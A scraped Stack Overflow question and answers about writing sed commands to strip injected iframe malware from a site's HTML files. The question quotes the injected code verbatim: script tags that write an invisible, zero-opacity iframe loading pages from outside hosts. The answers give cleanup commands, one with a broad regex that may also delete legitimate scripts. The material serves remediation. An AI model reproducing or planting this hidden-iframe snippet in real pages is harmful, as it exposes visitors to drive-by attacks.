Cleaning up iframe malware

问题

I'm helping someone clean up a malware infection on a site and I'm having a difficult time correctly matching some strings in sed so I can create a script to mass search and replace / remove it.

The strings are:

<script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>');</script>

<script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://vidintex.com/includes/class.pop.php"></iframe></div>');</script>

<script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>');</script>

I can't seem to figure out how to escape the various characters in those lines...

If I try to just say delete the entire line if it matches http://vidintex.com/includes/class.pop.php it also deletes the closing html </body> in the .html files as well.

So I need to be able to match this entire line in sed:

    <script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>');</script>

Any help would be greatly appreciated!

回答1:

You can try doing this :

sed -i '/vidintex.com\/includes\/class.pop.php/d' files*

This will delete all lines containing vidintex.com/includes/class.pop.php

回答2:

You may start using SMScanner at sourceforge! It will solve your problems instantly

回答3:

Similar to Looking for script to delete iframe malware from linux server, you can look for the script tag that is placed next to the final body tag and replace that with just the body tag. This script will find all the affected files and remove the final script.

It has the potential that it might find genuine files with scripts at the end - so first check that the grep for files only finds infected files.

# grep recursively for text
# escape all spaces in file names
# global search and replace with just body tag
grep -Rl "</script></body>" * | sed 's/ /\ /g' | xargs sed -i 's/<script .*><\/script><\/body>/<\/body>/g'

来源：https://stackoverflow.com/questions/13040532/cleaning-up-iframe-malware